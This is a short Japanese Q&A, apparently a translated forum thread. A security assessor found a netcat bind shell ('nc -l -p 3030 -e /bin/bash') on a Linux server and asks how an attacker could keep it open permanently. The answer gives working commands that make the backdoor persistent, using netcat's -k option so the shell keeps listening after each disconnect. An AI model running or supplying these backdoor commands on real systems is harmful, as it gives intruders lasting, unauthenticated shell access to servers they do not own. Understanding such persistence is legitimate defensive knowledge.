Netcatを使用した永続的なバックドア
評価中にLinuxサーバーの1つで次のコマンドを数回見つけました。
nc -l -p 3030 -e /bin/bash
これにより、ハッカーはbashを介してこのサーバーを制御できるようになります。それをテストしたところ、クライアントが接続を中断するたびに、ドアが再び閉じられることに気付きました。
ハッカーがこのドアを永続的に開いたままにする方法はありますか?
-kオプション付きのNcが役立ちます。
nc -l -k -p 3030 -e /bin/bash
nc -l -k -p 3030 | /bin/bash
現在の接続が完了した後、ncに別の接続の待機を強制します。 -lオプションなしでこのオプションを使用すると、エラーになります。 -uオプションと一緒に使用すると、サーバーソケットは接続されず、複数のホストからUDPデータグラムを受信できます。